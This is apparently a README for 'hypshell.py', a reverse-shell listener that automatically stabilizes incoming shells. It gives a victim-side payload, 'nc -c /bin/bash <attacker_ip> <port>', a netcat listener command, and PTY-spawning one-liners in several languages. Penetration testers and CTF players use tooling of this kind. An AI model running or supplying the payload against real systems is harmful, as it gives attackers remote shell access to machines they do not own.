A simple reverse shell handler and automatic stabilizer
Listens and automates the process of stabilizing a reverse shell
usage: ./hypshell.py [options] port
You can run the script on the attacking machine to listen for incoming connections.
Run this payload on the victim to start a reverse shell:
nc -c /bin/bash <attacker_ip> <port>
To make the script executable run: chmod +x hypshell.py
NOTE: To exit the program you have to enter "exit" in the shell session even if you can't read the input
usage: ./hypshell.py [options] port
positional arguments:
port port number
-h, --help show this help message and exit
-m method, --method method
stabilize the connection using the specified method (default: script)
-v, --verbose verbose mode
-i interface, --interface interface
specify the network interface to use
-n, --normal use normal mode instead of alternate screen
-c, --stabilize do not stabilize the shell
-e, --echo echo input
-s shell, --shell shell
specify the full path of the shell to use (default: /bin/bash)
-t, --sigint handle SIGINT signal
-r, --sigterm handle SIGTERM signal
-q, --sigquit handle SIGQUIT signal
-x address, --connect address
connect to specified address instead of bind
Start a reverse shell listener on port 4242:
hypshell.py 4242
Handle ^\
to exit the program:
hypshell.py 4242 -q
Use normal mode instead of alternative screen:
hypshell.py 4242 -n
Don't stabilize the shell and turn input echo on:
hypshell.py 4242 -se
Use connect mode and verbose:
hypshell.py 4242 -vx
Set shell to /bin/sh
and use python3 PTY stabilization method:
hypshell.py 4242 -s /bin/sh -m python3
Feel free to append your own methods to the code.
script: /usr/bin/script -qc {shell} /dev/null
socat: /usr/bin/socat exec:'{shell} -li',pty,stderr,setsid,sigint,sane tcp-connect
python3: python3 -c 'import pty; pty.spawn("{shell}")'
perl: perl -e 'exec "{shell}";'
ruby: ruby -e 'exec "{shell}";'
lua: lua -e 'os.execute("{shell}")'
echo: echo os.system('{shell}')
This tool is used to replace a basic reverse shell listener such as netcat or socat, instead of running:
nc -lnvp 4242
/usr/bin/script -qc /bin/bash /dev/null
export TERM=xterm
stty raw -echo
You can just run 1 simple command that will do everything for you:
hypshell.py 4242
- add more stabilization methods
- rewrite the tool in C and upload binaries
- more